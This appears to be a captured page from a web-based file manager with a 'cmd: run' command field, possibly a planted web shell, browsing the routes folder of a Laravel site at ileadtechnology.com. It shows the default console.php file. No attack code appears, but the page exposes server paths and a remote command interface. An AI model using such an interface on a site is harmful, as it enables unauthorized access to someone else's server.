/
home
/
techb158
/
ileadtechnology.com
/
routes
/
/home/techb158/ileadtechnology.com/routes
mkdir
upload
Name
Size
Mode
Actions
api.php
4841
0644
edit
dl
rm
channels.php
508
0644
edit
dl
rm
console.php
553
0644
edit
dl
rm
web.php
38960
0644
edit
dl
rm
Edit:
/home/techb158/ileadtechnology.com/routes/console.php
(553B)
<?php use Illuminate\Foundation\Inspiring; /* |-------------------------------------------------------------------------- | Console Routes |-------------------------------------------------------------------------- | | This file is where you may define all of your Closure based console | commands. Each Closure is bound to a command instance allowing a | simple approach to interacting with each command's IO methods. | */ Artisan::command('inspire', function () { $this->comment(Inspiring::quote()); })->describe('Display an inspiring quote');
Save
cmd:
run